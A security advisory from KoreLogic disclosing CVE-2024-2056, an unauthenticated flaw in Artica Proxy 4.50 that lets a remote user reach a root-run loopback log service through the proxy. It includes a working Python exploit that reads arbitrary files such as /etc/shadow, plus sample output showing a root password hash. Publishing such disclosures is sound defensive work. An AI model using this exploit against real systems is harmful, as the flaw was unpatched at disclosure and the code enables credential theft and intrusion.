Share
## https://sploitus.com/exploit?id=PACKETSTORM:177484
KL-001-2024-004: Artica Proxy Loopback Services Remotely Accessible Unauthenticated  
  
Title: Artica Proxy Loopback Services Remotely Accessible Unauthenticated  
Advisory ID: KL-001-2024-004  
Publication Date: 2024.03.05  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-004.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Artica  
Affected Product: Artica Proxy  
Affected Version: 4.50  
Platform: Debian 10 LTS  
CWE Classification: CWE-288: Authentication Bypass Using an  
Alternate Path or Channel, CWE-552: Files  
or Directories Accessible to External  
Parties  
CVE ID: CVE-2024-2056  
  
  
2. Vulnerability Description  
  
Services that are running and bound to the loopback  
interface on the Artica Proxy are accessible through  
the proxy service. In particular, the "tailon" service is  
running as the root user, is bound to the loopback interface,  
and is listening on TCP port 7050. Security issues associated  
with exposing this network service are documented at  
https://github.com/gvalkov/tailon#security. Using the tailon  
service, the contents of any file on the Artica Proxy can be  
viewed.  
  
  
3. Technical Description  
  
root@artica-450:~# netstat -anop | grep LIST | egrep '127.0.|::' | awk '{ print $4 " " $7 }'  
127.0.0.1:57585 <PID>/(squid-1)  
127.0.0.1:8562 <PID>/nginx:  
127.0.0.1:884 <PID>/sshd  
127.0.0.55:53 <PID>/dnscache  
127.0.0.1:9143 <PID>/[authlog]  
127.0.0.1:5432 <PID>/postgres  
127.0.0.1:2521 <PID>/artica-smtpd  
127.0.0.1:2874 <PID>/monit  
127.0.0.1:19102 <PID>/[cache-tail]  
127.0.0.1:3333 <PID>/go-shield-serv  
127.0.0.1:389 <PID>/slapd  
127.0.0.1:3334 <PID>/go-exec  
127.0.0.1:7050 <PID>/tailon  
:::4949 <PID>/perl  
:::9025 <PID>/[error-page]  
  
root@artica-450:~# ps -efww | grep tailon  
root 2765 1 0 Nov07 ? 00:01:29 /sbin/tailon --allow-download --config /etc/tailon/config.toml   
alias=Syslog,group=System,/var/log/syslog alias=Daemons,group=Services,/var/log/*.log   
alias=Proxy,group=Service-Proxy,/var/log/squid/*.log alias=Nginx,group=Service-Web,/var/log/nginx/*.log  
  
  
4. Mitigation and Remediation Recommendation  
  
No response from vendor; no remediation available.  
  
  
5. Credit  
  
This vulnerability was discovered by Jim Becher and Jaggar  
Henry of KoreLogic, Inc.  
  
  
6. Disclosure Timeline  
  
2023.12.18 - KoreLogic requests vulnerability contact and  
secure communication method from Artica.  
2023.12.18 - Artica Support issues automated ticket #1703011342  
promising follow-up from a human.  
2024.01.10 - KoreLogic again requests vulnerability contact and  
secure communication method from Artica.  
2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from  
mail.articatech.com with response  
"Client host rejected: Go Away!"  
2024.01.11 - KoreLogic requests vulnerability contact and  
secure communication method via  
https://www.articatech.com/ 'Contact Us' web form.  
2024.01.23 - KoreLogic requests CVE from MITRE.  
2024.01.23 - MITRE issues automated ticket #1591692 promising  
follow-up from a human.  
2024.02.01 - 30 business days have elapsed since KoreLogic  
attempted to contact the vendor.  
2024.02.06 - KoreLogic requests update on CVE from MITRE.  
2024.02.15 - KoreLogic requests update on CVE from MITRE.  
2024.02.22 - KoreLogic reaches out to alternate CNA for  
CVE identifiers.  
2024.02.26 - 45 business days have elapsed since KoreLogic  
attempted to contact the vendor.  
2024.02.29 - Vulnerability details presented to AHA!  
(takeonme.org) by proxy.  
2024.03.01 - AHA! issues CVE-2024-2056 to track this  
vulnerability.  
2024.03.05 - KoreLogic public disclosure.  
  
  
7. Proof of Concept  
  
$ python3 exploit.py 192.168.2.139 /etc/shadow  
1701282189.746 35 192.168.2.99 TCP_TUNNEL/200 3496 CONNECT 0.0.0.0:7050 - HIER_DIRECT/0.0.0.0:7050 -   
mac=\\\"e0:d5:5e:0a:d3:24\\\" category:%200%0D%0Acategory-name:%20Unknown%0D%0Aclog:%20cinfo:0-Unknown;%0D%0A   
exterr=\\\"-|-\\\"  
root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::  
daemon:*:19507:0:99999:7:::  
bin:*:19507:0:99999:7:::  
sys:*:19507:0:99999:7:::  
sync:*:19507:0:99999:7:::  
games:*:19507:0:99999:7:::  
man:*:19507:0:99999:7:::  
...  
...  
  
  
### exploit.py  
  
import re  
import sys  
import json  
import websocket  
  
"""  
run `pip install websocket-client` before executing.  
"""  
  
ARTICA_PROXY_IP = sys.argv[1] if len(sys.argv) >= 2 else '172.17.0.1'  
FILE_TO_READ = sys.argv[2] if len(sys.argv) >= 3 else '/etc/passwd'  
WEBSOCKET_URI = 'ws://0.0.0.0:7050/tailon/ws/1337/korelogic/websocket'  
  
payload = {  
'command': 'sed',  
'script': f'r {FILE_TO_READ}',  
'entry': {  
'path': '/var/log/squid/access.log',  
'alias': 'Proxy/access.log',  
},  
'nlines': 1  
}  
  
websocket_message = json.dumps([json.dumps(payload)])  
  
ws = websocket.WebSocket()  
ws.connect(WEBSOCKET_URI, http_proxy_host=ARTICA_PROXY_IP, http_proxy_port='8085', proxy_type='http')  
ws.send(websocket_message)  
  
reading = True  
while reading:  
data = re.search(r'a\["\[\\"o\\",\\"(.*)\\"]"]$', ws.recv())  
if data: print(data.group(1))  
  
ws.close()  
  
  
The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt